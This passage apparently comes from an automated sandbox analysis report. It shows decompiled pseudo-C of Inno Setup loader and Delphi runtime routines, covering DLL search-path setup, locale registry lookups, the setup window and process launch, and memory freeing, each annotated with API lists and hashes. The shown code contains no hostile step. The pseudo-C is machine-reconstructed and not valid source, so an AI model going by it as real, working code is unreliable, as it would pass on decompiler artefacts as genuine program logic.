                                                            					return E00407A80( &_v60, 0xe);
                                                            				} else {
                                                            					_t148 = GetModuleHandleW(L"kernel32.dll");
                                                            					_t39 = GetVersion();
                                                            					_t111 = 0;
                                                            					if(_t39 != 0x600) {
                                                            						_t150 = GetProcAddress(_t148, "SetDefaultDllDirectories");
                                                            						if(_t150 != 0) {
                                                            							 *_t150(0x800);
                                                            							asm("sbb ebx, ebx");
                                                            							_t111 = 1;
                                                            						}
                                                            					}
                                                            					if(_t111 == 0) {
                                                            						_t46 = GetProcAddress(_t148, "SetDllDirectoryW");
                                                            						if(_t46 != 0) {
                                                            							 *_t46(0x4b53e4);
                                                            						}
                                                            						E0040E520( &_v8);
                                                            						E00407E00(0x4be668, _v8);
                                                            						if( *0x4be668 != 0) {
                                                            							_t51 =  *0x4be668;
                                                            							if(_t51 != 0) {
                                                            								_t51 =  *(_t51 - 4);
                                                            							}
                                                            							if( *((short*)( *0x4be668 + _t51 * 2 - 2)) != 0x5c) {
                                                            								E004086E4(0x4be668, 0x4b53f4);
                                                            							}
                                                            							E0040873C( &_v12, L"uxtheme.dll",  *0x4be668);
                                                            							E0040E54C(_v12, _t111);
                                                            							E0040873C( &_v16, L"userenv.dll",  *0x4be668);
                                                            							E0040E54C(_v16, _t111);
                                                            							E0040873C( &_v20, L"setupapi.dll",  *0x4be668);
                                                            							E0040E54C(_v20, _t111);
                                                            							E0040873C( &_v24, L"apphelp.dll",  *0x4be668);
                                                            							E0040E54C(_v24, _t111);
                                                            							E0040873C( &_v28, L"propsys.dll",  *0x4be668);
                                                            							E0040E54C(_v28, _t111);
                                                            							E0040873C( &_v32, L"dwmapi.dll",  *0x4be668);
                                                            							E0040E54C(_v32, _t111);
                                                            							E0040873C( &_v36, L"cryptbase.dll",  *0x4be668);
                                                            							E0040E54C(_v36, _t111);
                                                            							E0040873C( &_v40, L"oleacc.dll",  *0x4be668);
                                                            							E0040E54C(_v40, _t111);
                                                            							E0040873C( &_v44, L"version.dll",  *0x4be668);
                                                            							E0040E54C(_v44, _t111);
                                                            							E0040873C( &_v48, L"profapi.dll",  *0x4be668);
                                                            							E0040E54C(_v48, _t111);
                                                            							E0040873C( &_v52, L"comres.dll",  *0x4be668);
                                                            							E0040E54C(_v52, _t111);
                                                            							E0040873C( &_v56, L"clbcatq.dll",  *0x4be668);
                                                            							E0040E54C(_v56, _t111);
                                                            							E0040873C( &_v60, L"ntmarta.dll",  *0x4be668);
                                                            							E0040E54C(_v60, _t111);
                                                            						}
                                                            					}
                                                            					_t42 = GetProcAddress(_t148, "SetSearchPathMode");
                                                            					if(_t42 != 0) {
                                                            						 *_t42(0x8001);
                                                            					}
                                                            					_t43 = GetProcAddress(_t148, "SetProcessDEPPolicy");
                                                            					if(_t43 != 0) {
                                                            						 *_t43(1); // executed
                                                            					}
                                                            					goto L19;
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B5146
                                                            • GetVersion.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B514D
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004B5162
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004B5188
                                                              • Part of subcall function 0040E54C: SetErrorMode.KERNEL32(00008000), ref: 0040E55A
                                                              • Part of subcall function 0040E54C: LoadLibraryW.KERNEL32(00000000,00000000,0040E5AE,?,00000000,0040E5CC,?,00008000), ref: 0040E58F
                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004B534A
                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004B5360
                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B536B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AddressProc$ErrorHandleLibraryLoadModeModulePolicyProcessVersion
                                                            • String ID: SetDefaultDllDirectories$SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$apphelp.dll$clbcatq.dll$comres.dll$cryptbase.dll$dwmapi.dll$hK$hK$kernel32.dll$ntmarta.dll$oleacc.dll$profapi.dll$propsys.dll$setupapi.dll$userenv.dll$uxtheme.dll$version.dll
                                                            • API String ID: 2248137261-3182217745
                                                            • Opcode ID: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                            • Instruction ID: 14362f36823de93a6bafc63c1bb5288ecf7b8ac372eee3bc1917329a49ba756d
                                                            • Opcode Fuzzy Hash: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                            • Instruction Fuzzy Hash: 57513C34601504ABE701EBA6DC82FDEB3A5AB94348BA4493BE40077395DF7C9D428B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 78%
                                                            			E0040AB18(char __eax, void* __ebx, void* __ecx, void* __edx) {
                                                            				char _v8;
                                                            				char* _v12;
                                                            				void* _v16;
                                                            				int _v20;
                                                            				short _v542;
                                                            				long _t51;
                                                            				long _t85;
                                                            				long _t87;
                                                            				long _t89;
                                                            				long _t91;
                                                            				long _t93;
                                                            				void* _t97;
                                                            				intOrPtr _t106;
                                                            				intOrPtr _t108;
                                                            				void* _t112;
                                                            				void* _t113;
                                                            				intOrPtr _t114;
                                                            
                                                            				_t112 = _t113;
                                                            				_t114 = _t113 + 0xfffffde4;
                                                            				_t97 = __edx;
                                                            				_v8 = __eax;
                                                            				E00407B04(_v8);
                                                            				_push(_t112);
                                                            				_push(0x40ad3d);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t114;
                                                            				if(_v8 != 0) {
                                                            					E0040A34C( &_v542, E004084EC(_v8), 0x105);
                                                            				} else {
                                                            					GetModuleFileNameW(0,  &_v542, 0x105);
                                                            				}
                                                            				if(_v542 == 0) {
                                                            					L18:
                                                            					_pop(_t106);
                                                            					 *[fs:eax] = _t106;
                                                            					_push(E0040AD44);
                                                            					return E00407A20( &_v8);
                                                            				} else {
                                                            					_v12 = 0;
                                                            					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
                                                            					if(_t51 == 0) {
                                                            						L10:
                                                            						_push(_t112);
                                                            						_push(0x40ad20);
                                                            						_push( *[fs:eax]);
                                                            						 *[fs:eax] = _t114;
                                                            						E0040A928( &_v542, 0x105);
                                                            						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
                                                            							if(RegQueryValueExW(_v16, E0040AE30, 0, 0, 0,  &_v20) == 0) {
                                                            								_v12 = E004053F0(_v20);
                                                            								RegQueryValueExW(_v16, E0040AE30, 0, 0, _v12,  &_v20);
                                                            								E00408550(_t97, _v12);
                                                            							}
                                                            						} else {
                                                            							_v12 = E004053F0(_v20);
                                                            							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
                                                            							E00408550(_t97, _v12);
                                                            						}
                                                            						_pop(_t108);
                                                            						 *[fs:eax] = _t108;
                                                            						_push(E0040AD27);
                                                            						if(_v12 != 0) {
                                                            							E0040540C(_v12);
                                                            						}
                                                            						return RegCloseKey(_v16);
                                                            					} else {
                                                            						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
                                                            						if(_t85 == 0) {
                                                            							goto L10;
                                                            						} else {
                                                            							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
                                                            							if(_t87 == 0) {
                                                            								goto L10;
                                                            							} else {
                                                            								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
                                                            								if(_t89 == 0) {
                                                            									goto L10;
                                                            								} else {
                                                            									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
                                                            									if(_t91 == 0) {
                                                            										goto L10;
                                                            									} else {
                                                            										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
                                                            										if(_t93 != 0) {
                                                            											goto L18;
                                                            										} else {
                                                            											goto L10;
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040AD3D,?,?), ref: 0040AB51
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040AB9A
                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040ABBC
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040ABDA
                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040ABF8
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040AC16
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040AC34
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D), ref: 0040AC74
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001), ref: 0040AC9F
                                                            • RegCloseKey.ADVAPI32(?,0040AD27,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales), ref: 0040AD1A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Open$QueryValue$CloseFileModuleName
                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                            • API String ID: 2701450724-3496071916
                                                            • Opcode ID: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                            • Instruction ID: cdbeddac4db4dda9279672c2614f8dce2a18b15a4a55f9a64fe791b6da82c449
                                                            • Opcode Fuzzy Hash: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                            • Instruction Fuzzy Hash: FB514371A80308BEEB10DA95CC46FAE77BCEB08709F504477BA04F75C1D6B8AA50975E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 85%
                                                            			E004B63A1(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                            				intOrPtr _t17;
                                                            				struct HWND__* _t21;
                                                            				struct HWND__* _t22;
                                                            				struct HWND__* _t25;
                                                            				intOrPtr _t26;
                                                            				intOrPtr _t28;
                                                            				intOrPtr _t36;
                                                            				intOrPtr _t39;
                                                            				int _t40;
                                                            				intOrPtr _t41;
                                                            				intOrPtr _t43;
                                                            				struct HWND__* _t46;
                                                            				intOrPtr _t47;
                                                            				intOrPtr _t50;
                                                            				intOrPtr _t60;
                                                            				intOrPtr _t62;
                                                            				intOrPtr _t68;
                                                            				intOrPtr _t69;
                                                            				intOrPtr _t70;
                                                            				void* _t73;
                                                            				void* _t74;
                                                            
                                                            				_t74 = __eflags;
                                                            				_t72 = __esi;
                                                            				_t71 = __edi;
                                                            				_t52 = __ebx;
                                                            				_pop(_t62);
                                                            				 *[fs:eax] = _t62;
                                                            				_t17 =  *0x4c1d88; // 0x0
                                                            				 *0x4c1d88 = 0;
                                                            				E00405CE8(_t17);
                                                            				_t21 = E0040E450(0, L"STATIC", 0,  *0x4be634, 0, 0, 0, 0, 0, 0, 0); // executed
                                                            				 *0x4ba450 = _t21;
                                                            				_t22 =  *0x4ba450; // 0x120262
                                                            				 *0x4c1d80 = SetWindowLongW(_t22, 0xfffffffc, E004AF69C);
                                                            				_t25 =  *0x4ba450; // 0x120262
                                                            				 *(_t73 - 0x58) = _t25;
                                                            				 *((char*)(_t73 - 0x54)) = 0;
                                                            				_t26 =  *0x4c1d90; // 0x4d703c
                                                            				_t4 = _t26 + 0x20; // 0x415c9b
                                                            				 *((intOrPtr*)(_t73 - 0x50)) =  *_t4;
                                                            				 *((char*)(_t73 - 0x4c)) = 0;
                                                            				_t28 =  *0x4c1d90; // 0x4d703c
                                                            				_t7 = _t28 + 0x24; // 0xcb000
                                                            				 *((intOrPtr*)(_t73 - 0x48)) =  *_t7;
                                                            				 *((char*)(_t73 - 0x44)) = 0;
                                                            				E0041A87C(L"/SL5=\"$%x,%d,%d,", 2, _t73 - 0x58, _t73 - 0x40);
                                                            				_push( *((intOrPtr*)(_t73 - 0x40)));
                                                            				_push( *0x4c1d84);
                                                            				_push(0x4b6680);
                                                            				E00422BC4(_t73 - 0x5c, __ebx, __esi, _t74);
                                                            				_push( *((intOrPtr*)(_t73 - 0x5c)));
                                                            				E004087C4(_t73 - 0x3c, __ebx, 4, __edi, __esi);
                                                            				_t36 =  *0x4c1d9c; // 0x0, executed
                                                            				E004AF728(_t36, _t52, 0x4ba44c,  *((intOrPtr*)(_t73 - 0x3c)), _t71, _t72, __fp0); // executed
                                                            				if( *0x4ba448 != 0xffffffff) {
                                                            					_t50 =  *0x4ba448; // 0x0
                                                            					E004AF60C(_t50);
                                                            				}
                                                            				_pop(_t68);
                                                            				 *[fs:eax] = _t68;
                                                            				_push(E004B6554);
                                                            				_t39 =  *0x4c1d88; // 0x0
                                                            				_t40 = E00405CE8(_t39);
                                                            				if( *0x4c1d9c != 0) {
                                                            					_t70 =  *0x4c1d9c; // 0x0
                                                            					_t40 = E004AF1B4(0, _t70, 0xfa, 0x32); // executed
                                                            				}
                                                            				if( *0x4c1d94 != 0) {
                                                            					_t47 =  *0x4c1d94; // 0x0
                                                            					_t40 = RemoveDirectoryW(E004084EC(_t47)); // executed
                                                            				}
                                                            				if( *0x4ba450 != 0) {
                                                            					_t46 =  *0x4ba450; // 0x120262
                                                            					_t40 = DestroyWindow(_t46); // executed
                                                            				}
                                                            				if( *0x4c1d78 != 0) {
                                                            					_t41 =  *0x4c1d78; // 0x0
                                                            					_t60 =  *0x4c1d7c; // 0x1
                                                            					_t69 =  *0x426bb0; // 0x426bb4
                                                            					E00408D08(_t41, _t60, _t69);
                                                            					_t43 =  *0x4c1d78; // 0x0
                                                            					E0040540C(_t43);
                                                            					 *0x4c1d78 = 0;
                                                            					return 0;
                                                            				}
                                                            				return _t40;
                                                            			}

























                                                            APIs
                                                              • Part of subcall function 0040E450: CreateWindowExW.USER32 ref: 0040E48F
                                                            • SetWindowLongW.USER32 ref: 004B641E
                                                              • Part of subcall function 00422BC4: GetCommandLineW.KERNEL32(00000000,00422C06,?,?,00000000,?,004B647E,004B6680,?), ref: 00422BDA
                                                              • Part of subcall function 004AF728: CreateProcessW.KERNEL32 ref: 004AF798
                                                              • Part of subcall function 004AF728: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                              • Part of subcall function 004AF728: MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                              • Part of subcall function 004AF728: GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                              • Part of subcall function 004AF728: CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                            • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                            • DestroyWindow.USER32(00120262,004B6554), ref: 004B6514
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                            • String ID: /SL5="$%x,%d,%d,$<pM$InnoSetupLdrWindow$STATIC
                                                            • API String ID: 3586484885-2916600167
                                                            • Opcode ID: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                            • Instruction ID: 04c90e22d0408fd8de4b79ff2beaee59f7a3a861a1d73b16261182ae62401715
                                                            • Opcode Fuzzy Hash: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                            • Instruction Fuzzy Hash: EC416B74A002009FE754EBA9EC85B9A37B4EB85308F11453BE0059B2B6CB7CA851CB5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E0040426C(void* __eax, signed int __edi, void* __ebp) {
                                                            				struct _MEMORY_BASIC_INFORMATION _v44;
                                                            				void* _v48;
                                                            				signed int __ebx;
                                                            				void* _t58;
                                                            				signed int _t61;
                                                            				int _t65;
                                                            				signed int _t67;
                                                            				void _t70;
                                                            				int _t71;
                                                            				signed int _t78;
                                                            				void* _t79;
                                                            				signed int _t81;
                                                            				intOrPtr _t82;
                                                            				signed int _t87;
                                                            				signed int _t88;
                                                            				signed int _t89;
                                                            				signed int _t92;
                                                            				void* _t96;
                                                            				signed int _t99;
                                                            				void* _t103;
                                                            				intOrPtr _t104;
                                                            				void* _t106;
                                                            				void* _t108;
                                                            				signed int _t113;
                                                            				void* _t115;
                                                            				void* _t116;
                                                            
                                                            				_t56 = __eax;
                                                            				_t89 =  *(__eax - 4);
                                                            				_t78 =  *0x4bb059; // 0x0
                                                            				if((_t89 & 0x00000007) != 0) {
                                                            					__eflags = _t89 & 0x00000005;
                                                            					if((_t89 & 0x00000005) != 0) {
                                                            						_pop(_t78);
                                                            						__eflags = _t89 & 0x00000003;
                                                            						if((_t89 & 0x00000003) == 0) {
                                                            							_push(_t78);
                                                            							_push(__edi);
                                                            							_t116 = _t115 + 0xffffffdc;
                                                            							_t103 = __eax - 0x10;
                                                            							E00403C48();
                                                            							_t58 = _t103;
                                                            							 *_t116 =  *_t58;
                                                            							_v48 =  *((intOrPtr*)(_t58 + 4));
                                                            							_t92 =  *(_t58 + 0xc);
                                                            							if((_t92 & 0x00000008) != 0) {
                                                            								_t79 = _t103;
                                                            								_t113 = _t92 & 0xfffffff0;
                                                            								_t99 = 0;
                                                            								__eflags = 0;
                                                            								while(1) {
                                                            									VirtualQuery(_t79,  &_v44, 0x1c);
                                                            									_t61 = VirtualFree(_t79, 0, 0x8000);
                                                            									__eflags = _t61;
                                                            									if(_t61 == 0) {
                                                            										_t99 = _t99 | 0xffffffff;
                                                            										goto L10;
                                                            									}
                                                            									_t104 = _v44.RegionSize;
                                                            									__eflags = _t113 - _t104;
                                                            									if(_t113 > _t104) {
                                                            										_t113 = _t113 - _t104;
                                                            										_t79 = _t79 + _t104;
                                                            										continue;
                                                            									}
                                                            									goto L10;
                                                            								}
                                                            							} else {
                                                            								_t65 = VirtualFree(_t103, 0, 0x8000); // executed
                                                            								if(_t65 == 0) {
                                                            									_t99 = __edi | 0xffffffff;
                                                            								} else {
                                                            									_t99 = 0;
                                                            								}
                                                            							}
                                                            							L10:
                                                            							if(_t99 == 0) {
                                                            								 *_v48 =  *_t116;
                                                            								 *( *_t116 + 4) = _v48;
                                                            							}
                                                            							 *0x4bdb78 = 0;
                                                            							return _t99;
                                                            						} else {
                                                            							return 0xffffffff;
                                                            						}
                                                            					} else {
                                                            						goto L31;
                                                            					}
                                                            				} else {
                                                            					__eflags = __bl;
                                                            					__ebx =  *__edx;
                                                            					if(__eflags != 0) {
                                                            						while(1) {
                                                            							__eax = 0x100;
                                                            							asm("lock cmpxchg [ebx], ah");
                                                            							if(__eflags == 0) {
                                                            								goto L14;
                                                            							}
                                                            							asm("pause");
                                                            							__eflags =  *0x4bb989;
                                                            							if(__eflags != 0) {
                                                            								continue;
                                                            							} else {
                                                            								Sleep(0);
                                                            								__edx = __edx;
                                                            								__ecx = __ecx;
                                                            								__eax = 0x100;
                                                            								asm("lock cmpxchg [ebx], ah");
                                                            								if(__eflags != 0) {
                                                            									Sleep(0xa);
                                                            									__edx = __edx;
                                                            									__ecx = __ecx;
                                                            									continue;
                                                            								}
                                                            							}
                                                            							goto L14;
                                                            						}
                                                            					}
                                                            					L14:
                                                            					_t14 = __edx + 0x14;
                                                            					 *_t14 =  *(__edx + 0x14) - 1;
                                                            					__eflags =  *_t14;
                                                            					__eax =  *(__edx + 0x10);
                                                            					if( *_t14 == 0) {
                                                            						__eflags = __eax;
                                                            						if(__eax == 0) {
                                                            							L20:
                                                            							 *(__ebx + 0x14) = __eax;
                                                            						} else {
                                                            							__eax =  *(__edx + 0xc);
                                                            							__ecx =  *(__edx + 8);
                                                            							 *(__eax + 8) = __ecx;
                                                            							 *(__ecx + 0xc) = __eax;
                                                            							__eax = 0;
                                                            							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
                                                            							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
                                                            								goto L20;
                                                            							}
                                                            						}
                                                            						 *__ebx = __al;
                                                            						__eax = __edx;
                                                            						__edx =  *(__edx - 4);
                                                            						__bl =  *0x4bb059; // 0x0
                                                            						L31:
                                                            						__eflags = _t78;
                                                            						_t81 = _t89 & 0xfffffff0;
                                                            						_push(_t101);
                                                            						_t106 = _t56;
                                                            						if(__eflags != 0) {
                                                            							while(1) {
                                                            								_t67 = 0x100;
                                                            								asm("lock cmpxchg [0x4bbae8], ah");
                                                            								if(__eflags == 0) {
                                                            									goto L32;
                                                            								}
                                                            								asm("pause");
                                                            								__eflags =  *0x4bb989;
                                                            								if(__eflags != 0) {
                                                            									continue;
                                                            								} else {
                                                            									Sleep(0);
                                                            									_t67 = 0x100;
                                                            									asm("lock cmpxchg [0x4bbae8], ah");
                                                            									if(__eflags != 0) {
                                                            										Sleep(0xa);
                                                            										continue;
                                                            									}
                                                            								}
                                                            								goto L32;
                                                            							}
                                                            						}
                                                            						L32:
                                                            						__eflags = (_t106 - 4)[_t81] & 0x00000001;
                                                            						_t87 = (_t106 - 4)[_t81];
                                                            						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
                                                            							_t67 = _t81 + _t106;
                                                            							_t88 = _t87 & 0xfffffff0;
                                                            							_t81 = _t81 + _t88;
                                                            							__eflags = _t88 - 0xb30;
                                                            							if(_t88 >= 0xb30) {
                                                            								_t67 = E00403AC0(_t67);
                                                            							}
                                                            						} else {
                                                            							_t88 = _t87 | 0x00000008;
                                                            							__eflags = _t88;
                                                            							(_t106 - 4)[_t81] = _t88;
                                                            						}
                                                            						__eflags =  *(_t106 - 4) & 0x00000008;
                                                            						if(( *(_t106 - 4) & 0x00000008) != 0) {
                                                            							_t88 =  *(_t106 - 8);
                                                            							_t106 = _t106 - _t88;
                                                            							_t81 = _t81 + _t88;
                                                            							__eflags = _t88 - 0xb30;
                                                            							if(_t88 >= 0xb30) {
                                                            								_t67 = E00403AC0(_t106);
                                                            							}
                                                            						}
                                                            						__eflags = _t81 - 0x13ffe0;
                                                            						if(_t81 == 0x13ffe0) {
                                                            							__eflags =  *0x4bbaf0 - 0x13ffe0;
                                                            							if( *0x4bbaf0 != 0x13ffe0) {
                                                            								_t82 = _t106 + 0x13ffe0;
                                                            								E00403B60(_t67);
                                                            								 *((intOrPtr*)(_t82 - 4)) = 2;
                                                            								 *0x4bbaf0 = 0x13ffe0;
                                                            								 *0x4bbaec = _t82;
                                                            								 *0x4bbae8 = 0;
                                                            								__eflags = 0;
                                                            								return 0;
                                                            							} else {
                                                            								_t108 = _t106 - 0x10;
                                                            								_t70 =  *_t108;
                                                            								_t96 =  *(_t108 + 4);
                                                            								 *(_t70 + 4) = _t96;
                                                            								 *_t96 = _t70;
                                                            								 *0x4bbae8 = 0;
                                                            								_t71 = VirtualFree(_t108, 0, 0x8000);
                                                            								__eflags = _t71 - 1;
                                                            								asm("sbb eax, eax");
                                                            								return _t71;
                                                            							}
                                                            						} else {
                                                            							 *(_t106 - 4) = _t81 + 3;
                                                            							 *(_t106 - 8 + _t81) = _t81;
                                                            							E00403B00(_t106, _t88, _t81);
                                                            							 *0x4bbae8 = 0;
                                                            							__eflags = 0;
                                                            							return 0;
                                                            						}
                                                            					} else {
                                                            						__eflags = __eax;
                                                            						 *(__edx + 0x10) = __ecx;
                                                            						 *(__ecx - 4) = __eax;
                                                            						if(__eflags == 0) {
                                                            							__ecx =  *(__ebx + 8);
                                                            							 *(__edx + 0xc) = __ebx;
                                                            							 *(__edx + 8) = __ecx;
                                                            							 *(__ecx + 0xc) = __edx;
                                                            							 *(__ebx + 8) = __edx;
                                                            							 *__ebx = 0;
                                                            							__eax = 0;
                                                            							__eflags = 0;
                                                            							_pop(__ebx);
                                                            							return 0;
                                                            						} else {
                                                            							__eax = 0;
                                                            							__eflags = 0;
                                                            							 *__ebx = __al;
                                                            							_pop(__ebx);
                                                            							return 0;
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • Sleep.KERNEL32(00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA,00000000), ref: 00404302
                                                            • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA), ref: 0040431C
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                            • Instruction ID: daf3465a9571387f72e828d046180f4ce70f3b260d456b91f151aa63c4646fa2
                                                            • Opcode Fuzzy Hash: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                            • Instruction Fuzzy Hash: AA71E2B17042008BD715DF29CC84B16BBD8AF85715F2482BFE984AB3D2D7B899418789
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			E004B60E8(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                            				intOrPtr _t26;
                                                            				intOrPtr _t31;
                                                            				intOrPtr _t37;
                                                            				intOrPtr _t38;
                                                            				intOrPtr _t42;
                                                            				intOrPtr _t44;
                                                            				intOrPtr _t47;
                                                            				intOrPtr _t51;
                                                            				intOrPtr _t53;
                                                            				intOrPtr _t55;
                                                            				intOrPtr _t56;
                                                            				intOrPtr _t59;
                                                            				intOrPtr _t61;
                                                            				WCHAR* _t63;
                                                            				intOrPtr _t69;
                                                            				intOrPtr _t74;
                                                            				int _t75;
                                                            				intOrPtr _t76;
                                                            				intOrPtr _t78;
                                                            				struct HWND__* _t81;
                                                            				intOrPtr _t82;
                                                            				intOrPtr _t86;
                                                            				void* _t90;
